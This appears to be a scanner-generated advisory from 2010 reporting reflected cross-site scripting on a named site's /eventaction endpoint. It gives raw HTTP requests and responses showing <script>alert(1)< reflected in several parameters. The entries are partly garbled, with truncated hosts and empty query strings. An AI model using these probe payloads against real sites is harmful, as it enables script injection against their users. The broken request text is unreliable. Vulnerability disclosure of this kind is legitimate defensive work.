1. Cross-site scripting (reflected)
1.1. http://event.microsite.marchex.com/eventaction [detail parameter]
1.3. http://event.microsite.marchex.com/eventaction [pageId parameter]
1.4. http://event.microsite.marchex.com/eventaction [referrer parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://event.microsite |
Path: | /eventaction |
GET /eventaction?referrer= Host: event.microsite.marchex Proxy-Connection: keep-alive Referer: http://www.prevarema.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 14:54:39 GMT Content-Length: 202 Content-Type: text/plain; charset=ISO-8859-1 Parameters: Name: detail Value: b9e9d<script>alert(1)< Name: referrer Value: Name: eventType Value: EVENT_TYPE_PAGE_VIEW Name: templateId Value: 1087 Name: pageId Value: 51737 |
Severity: | High |
Confidence: | Certain |
Host: | http://event.microsite |
Path: | /eventaction |
GET /eventaction?referrer= Host: event.microsite.marchex Proxy-Connection: keep-alive Referer: http://www.prevarema.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 14:54:44 GMT Content-Length: 219 Content-Type: text/plain; charset=ISO-8859-1 Parameters: Name: detail Value: Name: referrer Value: Name: f6c22<script>alert(1)< Name: eventType Value: EVENT_TYPE_PAGE_VIEW Name: templateId Value: 1087 Name: pageId Value: 51737 |
Severity: | High |
Confidence: | Certain |
Host: | http://event.microsite |
Path: | /eventaction |
GET /eventaction?referrer= Host: event.microsite.marchex Proxy-Connection: keep-alive Referer: http://www.prevarema.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 14:54:41 GMT Content-Length: 202 Content-Type: text/plain; charset=ISO-8859-1 Parameters: Name: detail Value: Name: referrer Value: Name: eventType Value: EVENT_TYPE_PAGE_VIEW Name: templateId Value: 1087 Name: pageId Value: 5173719810<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://event.microsite |
Path: | /eventaction |
GET /eventaction?referrer=6c356<script>alert(1)< Host: event.microsite.marchex Proxy-Connection: keep-alive Referer: http://www.prevarema.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 14:54:10 GMT Content-Length: 202 Content-Type: text/plain; charset=ISO-8859-1 Parameters: Name: referrer Value: 6c356<script>alert(1)< Name: detail Value: Name: templateId Value: 1087 Name: pageId Value: 51737 Name: eventType Value: EVENT_TYPE_PAGE_VIEW |